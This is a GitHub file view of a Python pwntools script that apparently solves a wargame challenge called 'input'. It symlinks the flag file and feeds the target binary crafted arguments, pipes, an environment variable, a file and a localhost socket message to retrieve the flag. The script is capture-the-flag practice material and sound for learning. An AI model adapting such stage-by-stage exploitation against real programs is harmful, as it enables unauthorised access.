-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathlocal_exploit.py
73 lines (59 loc) · 1.81 KB
/
local_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
"""
Local exploit
Just walk through all the stages and take the flag.
"""
from pwn import *
from os import pipe, write
def exploit():
# Firstly, i do the symlink to flag
p = process(['ln', '-s', '/home/input2/flag', 'flag'])
# Get args
args = pass_stage1()
# Get the input to stdin and stderr
r1, r2 = pass_stage2()
# Get env variables
env = pass_stage3()
# Execute process with this parameters
p = process(executable='/home/input2/input', argv=args, stdin=r1, stderr=r2, env=env)
# Another stages after process will start
pass_stage4()
pass_stage5()
print(p.recv())
print(p.recv())
print(p.recv())
p.close()
def pass_stage1():
# Function to pass stage one
# Generate the argv for process
args = ['\x90' for i in range(100)]
# First argument is name of program which process will execute
args[0] = './input'
# From source code we have two conditions:
args[ord('A')] = '\x00'
args[ord('B')] = '\x20\x0a\x0d'
# Specify the port for stage 5
args[ord('C')] = '4444'
return args
def pass_stage2():
# Create a one pipe for stdin
r1, w1 = os.pipe()
# Another pipe for stderr
r2, w2 = os.pipe()
# Write all to pipes
os.write(w1, '\x00\x0a\x00\xff')
os.write(w2, '\x00\x0a\x02\xff')
# Return objects to read from pipes
return r1, r2
def pass_stage3():
# Just return the dict with env variable
return {'\xde\xad\xbe\xef': '\xca\xfe\xba\xbe'}
def pass_stage4():
# Open a file and write in
open('\x0a', 'w').write('\x00\x00\x00\x00')
def pass_stage5():
# Connect to the localhost on port 4444 from args[ord('C')]
# I know it's hardcoded but in this case it's simple
con = remote('localhost', 4444)
con.sendline('\xde\xad\xbe\xef')
if __name__=='__main__':
exploit()